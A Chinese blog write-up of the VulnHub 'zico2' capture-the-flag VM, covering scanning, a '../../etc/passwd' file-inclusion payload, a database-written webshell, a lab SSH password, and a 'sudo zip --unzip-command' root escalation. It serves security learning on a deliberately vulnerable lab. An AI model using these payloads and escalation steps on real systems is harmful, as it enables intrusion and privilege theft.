zico靶机实战过程

释放双眼,带上耳机,听听看~!

项目地址

https://www.vulnhub.com/entry/zico2-1,210/

项目介绍

使用此虚拟机,即表示您同意我在任何情况下都不对任何损失或损害承担责任,包括但不限于间接或后果性损失或损坏,或由于或由此引起的数据或利润损失所造成的任何损失或损害。与使用此软件的连接。I口语天涯吧

TL; DR – 您即将加载具有漏洞的虚拟机。如果发生了不好的事情,那不是我的错。

等级:中级

目标:获取root并读取标志文件

任务实施:

1.配置虚拟机

网络链接模式(vmware同为nat模式{都在一个网段})

2.nmap扫描网段内存活主机(我的是192.168.138.*)

发现存活主机192.168.138.139

对他进行针对性端口扫描

发现开放22 80 111 端口

(1.)首先访问80端口

存在文件包含

进一步验证

构造

http://192.168.138.139/view.php?page=../../etc/passwd

然后使用kali drib扫描目录

发现敏感目录

尝试打开

弱密码admin

去寻找了一下这个版本的漏洞

在数据库中写入一句话 并且利用文件包含直接利用

 

但是只是www-data用户 权限很低

下面进入提权

进入home/zico看到

成功登陆

Username zico

Password sshsWfCsfJSPV9H3AmQzw8

然后执行whoami

Sudo –l(列出目前用户可执行与无法执行的指令;

touch /tmp/exploit

 sudo -u rootzip /tmp/exploit.zip /tmp/exploit -T –unzip-command=”sh -c/bin/bash”

提权成功

Cd/root

Catflag.txt

打完收工!!!

__________________________________________________________

声明:本文章来自团队成员BUGMAN投稿,仅供安全爱好者研究学习,对于用于非法途径的行为,作者不承担任何责任。

我们建立了一个以知识共享为主的免费知识星球,旨在通过相互交流,促进资源分享和信息安全建设,为以此为生的工作者、即将步入此行业的学生等提供各自之力。为保持知识星球长久发展,所有成员需遵守本星球免费规则,鼓励打赏;同时保持每月分享至少一次资源(安全类型资源不限,但不能存在一切违法违规及损害他人利益行为),避免“伸手党”,即使新人我们也鼓励通过分享心得和笔记取得进步,“僵尸粉”将每月定期清理。

也欢迎大家加入QQ群:838278452、594479150(国内专业度最高的互联网安全交流平台之一,你关心的、你想要的这里都可以满足你)

人已赞赏
安全工具

基于Wazuh的Ossec安全架构方案

2019-10-11 17:02:25

安全工具

MSSQL注入的高级安全技术

2019-10-11 17:02:33

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索